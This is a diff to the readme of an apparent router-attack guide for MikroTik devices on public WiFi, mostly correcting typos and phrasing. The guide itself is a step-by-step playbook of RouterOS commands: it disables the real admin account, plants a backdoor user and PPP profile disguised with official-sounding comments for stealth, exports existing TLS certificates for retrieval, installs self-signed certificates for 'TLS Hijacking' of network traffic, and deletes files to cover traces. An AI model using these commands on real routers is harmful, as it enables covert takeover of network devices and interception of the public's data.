J4ck3LSyN-Gen2/MikroTik-MeltDown-The-Sad-Reality-of-IoT-and-Public-WiFi/readme.md

         - `user edit admin password="..."` _NOTE: This seems ineffective on `http://172.16.0.1:55519`_
         - `user edit admin password=""`
         - `user enable www`
-        - `user diable admin`
+        - `user disable admin`

     * **2.4 SE Implementation**
-        The objective here is to establish as user that would look similar to an `authorized` remote access/user.
+        The objective here is to establish a user that would look similar to an `authorized` remote access/user.
 In our case being `MikroTik`, the configurations will be as follows.
         - `user add copy-from=admin name="www" password="..."`
         - `user set www comment="MikroTik Remote Security Service"`

 * **3. PPP:Point-To-Point Profile Creation (Essential)**
-    This profile is going to be used around, in my concept I prefered the `SE` method for account creation due to the relation.
+    This profile is going to be used around; in this concept, we preferred the `SE` method for account creation due to its stealth.
     * **3.1 Execution**
         - `ppp profile add name=wwwProfile local-address=... remote-address=pool1 rate-limit=1M/1M`
     * **3.2 SE**
         - `ppp profile set comment="MikroTik Remote Web-Service Profile"`

-* **4. TLS Hijacking** Possibly one of the worst _vectors.
-Allowing for full control over data sent over the network.
-NOTE: This is also needed for remote access to the server directly._
+* **4. TLS Hijacking** Possibly one of the worst vectors.
+Allowing for full control over data sent over the network. _NOTE: This is also needed for remote access to the server directly._
     * **4.1 Check Existing Certs** Validate any existing TLS certificates.
         - `certificate print`
     * **4.2 Export Any Existing** Export any existing (proper way...)
         - `certificate export-certificate [find name~"."] export-passphrase=""` _NOTE: This file will be able to be located using `file print`.
-I have noticed that the `export` command fails on direct download, further down we will implement the `tool fetch` command to `fetch` the file down to our device._
+We have noticed that the `export` command fails on direct download; further down we will implement the `tool fetch` command to `fetch` the file down to our device._
-    * **4.3 Build Your Certificates** Build you own _SE_ method.
+    * **4.3 Build Your Certificates** Build your own _SE_ method.
         - `certificate add name="www" common-name="MikroTik" country="US" state=".." locality="..." organization="MikroTik" days-valid=3650 key-size=2048`
     * **4.4 Sign It**
         - `certificate sign www`
-    * **4.5 Assign To The Web-Services**
+    * **4.5 Assign To The Web Services**
         - `ip service set www certificate=www disabled=no`
-    * **4.6 Sanitize** Always santize post `export`.
+    * **4.6 Sanitize** Always sanitize post `export`.
         - `file remove cert_export_*`
     * **4.7 Remove** Delete the cert, _Nuclear Option._
         - `certificate remove www`